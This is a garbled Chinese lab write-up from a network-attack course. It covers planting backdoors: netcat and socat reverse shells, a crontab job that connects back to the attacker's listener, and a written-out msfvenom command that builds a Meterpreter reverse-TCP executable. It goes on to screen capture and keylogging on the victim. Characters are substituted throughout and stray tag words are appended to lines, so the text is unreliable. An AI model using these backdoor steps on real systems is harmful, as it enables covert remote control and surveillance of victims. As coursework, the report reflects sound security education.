20145320周岐浩 《网络对抗技术》 后门原理与实践linux
盗版软件不安全!正版软件要收费!反正360都已经把咱们的隐私给卖了...仍是用盗版吧..可是能不给权限尽可能不给权限!通过这几回实验感受咱们的电脑简直不堪一击,想干吗就干吗。黑客开心就好...shell
首先先ping通两台linux和windows:
windows
打开netcat监听端口
安全
在windows中使用netcat绑定cmd链接到linux的正在监听的端口bash
方法同上相似,这里再也不列举。可是须要注意的是linux的shell应该是在/bin/sh网络
在linux中使用crontab指令增长一条定时3分钟任务则利用netcat链接道控制端的命令
tcp
windows一直开启netcat监听,等到3分后,windows获取linux的shell成功
网站
在linux中,使用socat绑定bash与端口号,监听,等待链接3d
windows中使用socat对linux进行tcp固定端口链接,成功获取linux的shell!注意所使用的端口号不能被占用!!code
生成可执行文件(反弹式),肯定好反弹回来的IP地址与端口号。须要注意的是这里老师给的是
root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 `PORT=443 -f exe > meter_backdoor.exe
注意不是`PORT
而是LPORT
(location port!)
在linux中,使用MSF设置好可执行文件对应的IP地址、端口号和payload
后,打开监听进程
因为vmware支持直接拖拽,因此省下了传输的步骤。在win中双击运行可执行文件之前,须要将win中的杀毒软件与防火墙设置一下。设置后再双击启动win上的可执行文件,linux成功获取winows的shell
获取目标主机的当前屏幕
获取目标主机的击键记录
这里能够看到在小键盘和普通键盘的输入并不同。
在提权的过程当中失败了